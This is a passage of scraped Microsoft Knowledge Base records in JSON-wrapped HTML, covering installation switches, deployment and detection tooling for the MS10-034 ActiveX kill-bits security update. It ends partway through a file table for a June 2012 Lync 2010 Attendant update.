computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/overwriteoem</td><td class=\"sbody-td\">Overwrites OEM files without prompting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/nobackup</td><td class=\"sbody-td\">Does not back up files that are needed for uninstallation.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/integrate:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Integrates the update into the Windows source files. These files are located by using the path that is specified in the switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/extract[:<strong class=\"sbody-strong\">path</strong>]</td><td class=\"sbody-td\">Extracts files, and the Setup program is not started.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/ER</td><td class=\"sbody-td\">Enables extended error reporting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/verbose</td><td class=\"sbody-td\">Enables verbose logging. During installation, creates a %Windir%\\CabBuild.log. This log details the files that are copied. By using this switch, the installation may run slower.</td></tr></tbody></table></div><span class=\"text-base\">Note</span> You can combine these switches into one command. For backward compatibility, the security update also supports many of the setup switches that the earlier version of the Setup program uses.<br/><span>For more information about the supported installation switches, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/262841\" id=\"kb-link-29\">262841 </a>Command-line switches for Windows software update packages</span></div><h5 class=\"sbody-h5 text-subtitle\">Removing the update</h5>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr></tbody></table></div><h5 class=\"sbody-h5 text-subtitle\">Verifying that the update was applied</h5><ul class=\"sbody-free_list\"><li><span class=\"text-base\">Microsoft Baseline Security Analyzer</span><br/><br/>To verify that a security update was applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the \"Detection and deployment tools and guidance\" section for more information.</li><li><span class=\"text-base\">Registry subkey verification</span><br/><br/>You may also be able to verify the files that this security update has installed by reviewing the registry subkeys that are listed in the reference table in this section. These registry subkeys may not contain a complete list of installed files. Also, these registry subkeys may not be created correctly when an administrator or an OEM integrates or slipstreams this security update into the Windows installation source files.</li></ul><h3 class=\"sbody-h3\">Windows Vista (all versions)</h3><h4 class=\"sbody-h4\">Reference table</h4>The following table contains the security update information for this software. You can find more information in the \"Deployment information\" section.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Inclusion in future service packs</th><th class=\"sbody-th\">The update for this issue will be included in a future service pack or update rollup</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Deployment</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without requiring user intervention</td><td class=\"sbody-td\">All supported 32-bit versions of Windows Vista:<br/>Windows6.0-KB980195-x86/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported 64-bit versions of Windows Vista:<br/>Windows6.0-KB980195-x64/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without restarting</td><td class=\"sbody-td\">All supported 32-bit versions of Windows Vista:<br/>Windows6.0-KB980195-x86/quiet/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported 64-bit versions of Windows Vista:<br/>Windows6.0-KB980195-x64/quiet/norestart</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart requirement</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart required?</td><td class=\"sbody-td\">In some cases, this update does not require a restart. If a restart is required, you receive a message that advises you to restart.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hotpatching</td><td class=\"sbody-td\">Not applicable.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">WUSA.exe does not support the uninstallation of updates. To uninstall an update that is installed by WUSA, open Control Panel, and then click <strong class=\"uiterm\">Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry subkey verification</td><td class=\"sbody-td\">A registry subkey does not exist to validate the presence of this update.</td></tr></tbody></table></div><h4 class=\"sbody-h4\">Deployment information</h4><h5 class=\"sbody-h5 text-subtitle\">Installing the Update</h5>When you install this security update, the installer checks whether one or more of the files that are being updated on the system have previously been updated by a Microsoft hotfix.<br/><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-30\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</span></div>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Supported security update installation switches</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/?, /h, /help</td><td class=\"sbody-td\">Displays help on supported switches.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Suppresses the display of status or error messages.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">When this switch is combined with the /quiet switch, the system is not restarted after installation even if a restart is required to complete the installation.</td></tr></tbody></table></div><span>For more information about the installer, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/934307\" id=\"kb-link-31\">934307 </a>Description of the Windows Update Stand-alone Installer (Wusa.exe) and of .msu files in Windows Vista and in Windows Server 2008</span></div><h5 class=\"sbody-h5 text-subtitle\">Verifying that the update was applied</h5>\u00a0<ul class=\"sbody-free_list\"><li><span class=\"text-base\">Microsoft Baseline Security Analyzer</span><br/><br/>To verify that a security update was applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the \"Detection and deployment tools and guidance\" section for more information.</li></ul><h3 class=\"sbody-h3\">Windows Server 2008 (all versions)</h3><h4 class=\"sbody-h4\">Reference table</h4>The following table contains the security update information for this software. You can find more information in the \"Deployment information\" section.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Inclusion in future service packs</th><th class=\"sbody-th\">The update for this issue will be included in a future service pack or update rollup</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Deployment</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without requiring user intervention</td><td class=\"sbody-td\">All supported 32-bit versions of Windows Server 2008:<br/>Windows6.0-KB980195-x86/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported 64-bit versions of Windows Server 2008:<br/>Windows6.0-KB980195-x64/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported Itanium-based versions of Windows Server 2008:<br/>Windows6.0-KB980195-ia64/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without restarting</td><td class=\"sbody-td\">All supported 32-bit versions of Windows Server 2008:<br/>Windows6.0-KB980195-x86/quiet/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported 64-bit versions of Windows Server 2008:<br/>Windows6.0-KB980195-x64/quiet/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">All supported Itanium-based versions of Windows Server 2008:<br/>Windows6.0-KB980195-ia64/quiet/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">More information</td><td class=\"sbody-td\">See the \"Detection and deployment tools and guidance\" section.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart requirement</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart required?</td><td class=\"sbody-td\">In some cases, this update does not require a restart. If a restart is required, you receive a message that advises you to restart.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hotpatching</td><td class=\"sbody-td\">Not applicable.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">WUSA.exe does not support the uninstallation of updates. To uninstall an update that is installed by WUSA, open Control Panel, and then click <strong class=\"uiterm\">Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry subkey verification</td><td class=\"sbody-td\">A registry subkey does not exist to validate the presence of this update.</td></tr></tbody></table></div><h4 class=\"sbody-h4\">Deployment information</h4><h5 class=\"sbody-h5 text-subtitle\">Installing the Update</h5>When you install this security update, the installer checks whether one or more of the files that are being updated on the system have previously been updated by a Microsoft hotfix.<br/><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-32\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</span></div>This security update supports the following setup switches:<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/?, /h, /help</td><td class=\"sbody-td\">Displays help on supported switches.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Suppresses the display of status or error messages.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">When you combine this switch with the /quiet switch, the system is not restarted after installation even if a restart is required to complete installation.</td></tr></tbody></table></div><span>For more information about this issue, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/934307\" id=\"kb-link-33\">934307 </a>Description of the Windows Update Stand-alone Installer (Wusa.exe) and of .msu files in Windows Vista and in Windows Server 2008</span></div><h5 class=\"sbody-h5 text-subtitle\">Verifying that the update was applied</h5><br/><span class=\"text-base\">Microsoft Baseline Security Analyzer</span><br/><br/>To verify that a security update was applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the \"Detection and deployment tools and guidance\" section for more information.<br/><br/>\u00a0<h3 class=\"sbody-h3\">Detection and deployment tools and guidance</h3>This section describes how to manage the software and security updates that you have to deploy to the servers, to the desktop computers, and to the mobile computers in your organization. For more information, visit the following Microsoft TechNet Update Management Center webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/updatemanagement/default.aspx\" id=\"kb-link-34\" target=\"_self\">http://technet.microsoft.com/en-us/updatemanagement/default.aspx</a></div>For more information about security in Microsoft products, visit the following Microsoft TechNet Security webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/security/default.aspx\" id=\"kb-link-35\" target=\"_self\">http://technet.microsoft.com/en-us/security/default.aspx</a></div>Security updates are available from Microsoft Update, Windows Update, and Office Update. Security updates are also available at the Microsoft Download Center. You can find them most easily by doing a keyword search for \"security update.\"<br/><br/>Finally, security updates can be downloaded from the Microsoft Update Catalog. For more information, visit the following Microsoft webpage:<div class=\"indent\"><a href=\"http://catalog.update.microsoft.com/v7/site/home.aspx\" id=\"kb-link-36\" target=\"_self\">http://catalog.update.microsoft.com/v7/site/Home.aspx</a></div>The Microsoft Update Catalog provides a catalog of content that is searchable and that is available through Windows Update and through Microsoft Update. This content includes security updates, drivers, and service packs. By using a security bulletin number such as \"MS08-010\" for your search, you can add all the applicable updates to your basket. You can also add different languages for an update to your basket, and you can download the content to any folder that you want. For more information about the Microsoft Update Catalog, visit the following Microsoft Update Catalog FAQ webpage:<div class=\"indent\"><a href=\"http://catalog.update.microsoft.com/v7/site/faq.aspx\" id=\"kb-link-37\" target=\"_self\">http://catalog.update.microsoft.com/v7/site/faq.aspx</a></div><h4 class=\"sbody-h4\">Detection and deployment guidance</h4>Microsoft has provided detection and deployment guidance for this month's security updates. This guidance will also help IT professionals understand how they can use various tools to help deploy the security update. These tools include Windows Update, Microsoft Update, Office Update, the Microsoft Baseline Security Analyzer (MBSA), the Office Detection Tool, Microsoft Systems Management Server (SMS), and the Extended Security Update Inventory Tool.<br/><span>For more information, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/910723\" id=\"kb-link-38\">910723 </a>Summary list of monthly detection and deployment guidance articles</span></div><h4 class=\"sbody-h4\">Microsoft Baseline Security Analyzer</h4>Microsoft Baseline Security Analyzer (MBSA) lets administrators scan local and remote systems for missing security updates. The Microsoft Baseline Security Analyzer can also identify common security misconfigurations. For more information, visit the following Microsoft Baseline Security Analyzer webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/security/cc184924.aspx\" id=\"kb-link-39\" target=\"_self\">http://technet.microsoft.com/en-us/security/cc184924.aspx</a></div>The following table provides the MBSA detection summary for this security update.<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Software</th><th class=\"sbody-th\">MBSA 2.1</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows 2000 with Service Pack 4</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows XP Service Pack 2 and Windows XP Service Pack 3</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows XP Professional and Windows XP Professional Service Pack 2, x64-based versions</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 and Windows Server 2003 Service Pack 2, x64-based versions</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 with SP1 for Itanium-based systems and Windows Server 2003 with SP2 for Itanium-based systems</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Vista and Windows Vista Service Pack 1</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Vista and Windows Vista Service Pack 1, 64-bit versions</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for 32-bit systems</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for 64-bit systems</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for Itanium-based systems</td><td class=\"sbody-td\">Yes</td></tr></tbody></table></div>For more information about MBSA 2.1, visit the following Microsoft MBSA 2.1 Frequently Asked Questions webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/security/cc184922.aspx\" id=\"kb-link-40\" target=\"_self\">http://technet.microsoft.com/en-us/security/cc184922.aspx</a></div><h4 class=\"sbody-h4\">Windows Server Update Services</h4>By using Windows Server Update Services (WSUS), administrators can deploy the latest critical updates and security updates for Windows 2000 operating systems and later versions, for Microsoft Office XP and later versions, for Microsoft Exchange Server 2003, and for Microsoft SQL Server 2000 and later versions. For more information about how to deploy this security update by using Windows Server Update Services, visit the following Microsoft Windows Server Update Services Product Overview webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/wsus/bb466208.aspx\" id=\"kb-link-41\" target=\"_self\">http://technet.microsoft.com/en-us/wsus/bb466208.aspx</a></div><h4 class=\"sbody-h4\">Systems Management Server</h4>The following table provides the SMS detection and deployment summary for this security update.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Software</th><th class=\"sbody-th\">SMS 2.0</th><th class=\"sbody-th\">SMS 2003 with SUSFP</th><th class=\"sbody-th\">SMS 2003 with ITMU</th><th class=\"sbody-th\">Configuration Manager 2007</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows 2000 with Service Pack 4</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows XP Service Pack 2 and Windows XP Service Pack 3</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows XP Professional and Windows XP Professional Service Pack 2, x64-based versions</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 and Windows Server 2003 Service Pack 2, x64-based versions</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2003 with SP1 for Itanium-based systems and Windows Server 2003 with SP2 for Itanium-based systems</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">Yes</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Vista and Windows Vista Service Pack 1</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">See the \"Note for Windows Vista and for Windows Server 2008\" section later in this article</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Vista and Windows Vista Service Pack 1, 64-bit versions</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">See the \"Note for Windows Vista and for Windows Server 2008\" section later in this article</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for 32-bit systems</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">See the \"Note for Windows Vista and for Windows Server 2008\" section later in this article</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for 64-bit systems</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">See the \"Note for Windows Vista and for Windows Server 2008\" section later in this article</td><td class=\"sbody-td\">Yes</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows Server 2008 for Itanium-based systems</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">No</td><td class=\"sbody-td\">See the \"Note for Windows Vista and for Windows Server 2008\" section later in this article</td><td class=\"sbody-td\">Yes</td></tr></tbody></table></div>For SMS 2.0 and for SMS 2003, the SMS SUS Feature Pack (SUSFP) that includes the Security Update Inventory Tool (SUIT) can be used by SMS to detect security updates. For more information, visit the following Microsoft webpage for Downloads for Systems Management Server 2.0:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/sms/bb676799.aspx\" id=\"kb-link-42\" target=\"_self\">http://technet.microsoft.com/en-us/sms/bb676799.aspx</a></div>For SMS 2003, the SMS 2003 Inventory Tool for Microsoft Updates (ITMU) can be used by SMS to detect security updates that are offered by Microsoft Update and that are supported by Windows Server Update Services. For more information about the SMS 2003 ITMU, visit the following Microsoft webpage for SMS 2003 Inventory Tool for Microsoft Updates:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/sms/bb676783.aspx\" id=\"kb-link-43\" target=\"_self\">http://technet.microsoft.com/en-us/sms/bb676783.aspx</a></div>SMS 2003 can also use the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications. For more information, visit the following Microsoft webpages:<ul class=\"sbody-free_list\"><li>Systems Management Server 2003 Software Update Scanning Tools<br/>\u00a0<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/sms/bb676786.aspx\" id=\"kb-link-44\" target=\"_self\">http://technet.microsoft.com/en-us/sms/bb676786.aspx</a></div></li><li>Downloads for Systems Management Server 2003<br/>\u00a0<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/sms/bb676766.aspx\" id=\"kb-link-45\" target=\"_self\">http://technet.microsoft.com/en-us/sms/bb676766.aspx</a></div></li></ul>System Center Configuration Manager (Configuration Manager 2007) 2007 uses WSUS 3.0 for detection of updates. For more information about Configuration Manager 2007 Software Update Management, visit the following Microsoft webpage:<div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/library/bb735860.aspx\" id=\"kb-link-46\" target=\"_self\">http://technet.microsoft.com/en-us/library/bb735860.aspx</a></div><span class=\"text-base\">Note for Windows Vista and for Windows Server 2008</span><br/><br/>Microsoft Systems Management Server 2003 with Service Pack 3 includes support for Windows Vista and for Windows Server 2008. For more information about SMS, visit the following Microsoft SMS webpage:<div class=\"indent\"><a href=\"http://www.microsoft.com/smserver/default.mspx\" id=\"kb-link-47\" target=\"_self\">http://www.microsoft.com/smserver/default.mspx</a></div><span>For more information about detection and deployment guidance articles, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/910723\" id=\"kb-link-48\">910723 </a>Summary list of monthly detection and deployment guidance articles</span></div></div></body></html>", "modified": "2020-05-21T04:15:59", "id": "KB980195", "href": "https://support.microsoft.com/en-us/help/980195/", "published": "2020-05-21T04:15:39", "title": "MS10-034: Cumulative security update of ActiveX kill bits", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-21T10:34:58", "bulletinFamily": "microsoft", "description": "<html><body><p>Describes the cumulative update for Lync 2010 Attendant that is dated June 2012 .</p><h2>Summary</h2><div class=\"kb-summary-section section\"><span>This article describes the issue that is fixed in the Microsoft Lync 2010 Attendant update package that is dated June 2012 .</span><span><div class=\"indent\">This article describes the following items about the update package:</div><ul class=\"sbody-free_list\"><li>The issues that the update package fixes.</li><li>The prerequisites for installing the update package.</li><li>Whether you must restart the computer after you install the update package.</li><li>Whether the update package is replaced by any other update package.</li><li>Whether you must make any registry changes. </li><li>The files that the update package contains. </li></ul></span><h3 class=\"sbody-h3\">Issue that this update fixes</h3>This update package fixes the issue that is documented in the following Microsoft Knowledge Base (KB) article:<div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2702444\" id=\"kb-link-1\">2702444 </a> MS12-039: Description of the security update for Lync 2010 Attendant: June 12, 2012</div></div><h2>Resolution</h2><div class=\"kb-resolution-section section\"><h3 class=\"sbody-h3\">Update package information</h3><span> </span>To get the standalone package for this update, go to the <a href=\"https://www.catalog.update.microsoft.com/Search.aspx?q=2496326\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a> website.<span> </span><h4 class=\"sbody-h4\">Prerequisites</h4><span>There are no prerequisites for installing this update package.</span><h4 class=\"sbody-h4\">Restart requirement</h4>You may have to restart the computer if certain dependencies of Microsoft Lync 2010 are still running when the cumulative update is applied. For example, you may have to restart the computer if you have Microsoft Office Outlook or Microsoft Lync 2010 Attendant running when the update is applied.<h4 class=\"sbody-h4\">Replacement information</h4><span>This update does not replace a previously released update.</span><h4 class=\"sbody-h4\">Registry information</h4><span>To use one of the update packages in this package, you do not have to make any changes to the registry.</span><h4 class=\"sbody-h4\">Removal information</h4>To remove this cumulative update, use the <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel.<br/><br/>Sometimes, you are prompted for the source CD when you try to uninstall the cumulative update. If this behavior occurs, insert the source CD, or provide the path where the source files can be found.<h4 class=\"sbody-h4\">File information</h4><span>This hotfix may not contain all the files that you must have to fully update a product to the latest build. This hotfix contains only the files that you must have to correct the issues that are listed in this article.</span><br/><br/><span>After the update is installed, the global version of this update has the file attributes, or a later version of the file attributes, that are listed in the following table:</span><h5 class=\"sbody-h5 text-subtitle\">For all supported x86-based versions</h5><div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Attendantconsoleexe</td><td class=\"sbody-td\">4.0.7577.4098</td><td class=\"sbody-td\">4,631,136</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">23:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Attoimdll</td><td class=\"sbody-td\">4.0.7577.4098</td><td class=\"sbody-td\">80,512</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">23:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ocapimdll</td><td class=\"sbody-td\">4.0.7577.4098</td><td class=\"sbody-td\">342,632</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">23:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Rtmpltfm_dll</td><td class=\"sbody-td\">4.0.7577.4098</td><td class=\"sbody-td\">6,416,976</td><td class=\"sbody-td\">16-May-2012</td><td class=\"sbody-td\">22:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapidll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">141,064</td><td class=\"sbody-td\">10-Feb-2011</td><td class=\"sbody-td\">11:28</td><td 